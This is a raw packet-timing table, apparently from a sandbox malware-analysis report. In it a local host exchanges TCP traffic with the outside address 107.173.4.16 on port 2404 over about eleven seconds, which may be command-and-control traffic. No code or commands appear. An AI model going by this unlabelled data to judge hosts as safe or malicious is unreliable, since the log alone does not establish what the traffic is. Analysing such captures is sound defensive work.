                                          Sep 30, 2024 14:00:30.974066019 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:30.977631092 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.977643967 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.978017092 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.978025913 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.978033066 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.978040934 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.978049040 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.978056908 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.978065014 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.983453989 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.983464956 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.983473063 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.983481884 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.983625889 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.983634949 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.983643055 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.983650923 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.983659029 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:30.983666897 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.709263086 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:31.714514017 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.818876982 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.862073898 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:31.863379002 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:31.867070913 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.867135048 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.867145061 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.867151976 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.867161989 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.867168903 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.867230892 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.867238998 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.867247105 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.867372036 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.872024059 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.872102976 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.872112036 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.872229099 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.872242928 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.872251034 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.872258902 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.872519970 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:31.872529030 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.584352970 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:32.589293957 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.694399118 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.740247011 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:32.753078938 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:32.754349947 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:32.758018970 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.758032084 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.758039951 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.758136988 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.758146048 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.758227110 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.758235931 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.758239985 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.758246899 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.762815952 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.762825012 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.762831926 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.762840986 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.762849092 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.762859106 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.762866974 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.762875080 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.762984991 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:32.762995958 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.443646908 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:33.448560953 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.553049088 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.599625111 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:33.600790977 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:33.602138996 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:33.605731010 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.605745077 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.605753899 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.605806112 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.605814934 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.605823994 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.605942011 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.605952024 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.606050968 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.610465050 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.610516071 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.610524893 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.610538960 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.610548019 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.610555887 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.610675097 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.610683918 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.610692024 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:33.610699892 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.271694899 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:34.276814938 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.381602049 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.424406052 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:34.425685883 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:34.429402113 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.429420948 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.429442883 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.429454088 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.429464102 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.429474115 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.429600000 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.429611921 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.429621935 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.429708958 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.434207916 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.434477091 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.434488058 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.434499025 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.434509039 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.434690952 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.434703112 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:34.434712887 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.068670034 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:35.073637009 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.181564093 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.223737955 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:35.225305080 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:35.228770018 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.228786945 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.228796005 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.228941917 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.228950977 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.228959084 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.228967905 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.228976965 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.228985071 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.228995085 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.233524084 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.233552933 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.233561993 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.233889103 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.233958960 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.233968019 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.234091997 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.834326982 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:35.839179039 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.944154978 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:35.990243912 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:36.009532928 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:36.010870934 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:36.014707088 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.014724016 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.014735937 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.014790058 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.014799118 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.014801979 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.014852047 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.015022993 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.015032053 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.019793987 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.019846916 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.019856930 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.020030022 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.020039082 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.020047903 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.020056009 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.020152092 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.020162106 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.020251036 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.584429979 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:36.589507103 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.694449902 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.742273092 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:36.743529081 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:36.747216940 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.747232914 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.747241974 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.747251987 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.747329950 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.747339010 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.747445107 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.747502089 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.747510910 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.747520924 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.751975060 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.751986027 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.751995087 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.752005100 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.752057076 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.752093077 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.752103090 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:36.752243996 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.311295033 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:37.316792965 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.422204018 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.474622965 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:37.488327980 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:37.489748955 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:37.493637085 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.493654013 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.493662119 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.493670940 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.493685007 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.493694067 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.493701935 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.493710995 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.493719101 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.499039888 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.499049902 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.499058008 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.499067068 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.499146938 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.499155998 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.499164104 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:37.499804020 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.006042004 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:38.010934114 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.115777969 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.160156012 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:38.161500931 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:38.165118933 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.165138006 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.165147066 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.165155888 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.165196896 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.165206909 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.165313959 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.165342093 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.165361881 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.165443897 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.169883013 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.169893026 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.169900894 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.169909000 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.169919014 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.170051098 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.170058966 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.170067072 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.170120955 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.678134918 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:38.683069944 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.787739992 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.847450018 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:38.848819971 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:38.852900982 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.852922916 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.852931976 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.853051901 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.853060961 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.853069067 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.853450060 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.853539944 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.853575945 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.854031086 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.857634068 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.857646942 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.857659101 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.857666969 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.857675076 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.857683897 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.857801914 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:38.857811928 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.334355116 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:39.339188099 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.443877935 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.487483978 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:39.488795996 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:39.492479086 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.492496967 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.492563963 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.492582083 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.492590904 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.492600918 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.492974043 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.492984056 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.492991924 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.493033886 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.497237921 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.497247934 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.497328043 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.497335911 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.497411013 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.497420073 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.497423887 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.497531891 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.497539997 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:39.959276915 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:39.964292049 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.068943977 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.112341881 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:40.113562107 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:40.117367983 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.117386103 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.117539883 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.117547989 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.117557049 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.117564917 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.117573023 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.117583990 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.117593050 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.117600918 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.122142076 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.122152090 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.122159004 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.122167110 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.122174978 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.122189045 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.122311115 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.568654060 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:40.693916082 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.798964977 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.849611044 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:40.865535975 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:40.866854906 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:40.870443106 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.870469093 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.870477915 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.870486021 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.870558023 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.870610952 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.870626926 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.870748997 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.870760918 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.870806932 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.875145912 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.875193119 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.875210047 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.875219107 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.875226974 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.875272036 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.875391960 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.875402927 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:40.875411034 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:41.162364960 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:41.171243906 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:41.272233009 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:41.313874960 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:41.315083981 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:41.318756104 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:41.318769932 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:41.318778038 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:41.318794012 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:41.318846941 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:41.318856955 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:41.318926096 CEST240449742107.173.4.16192.168.2.4
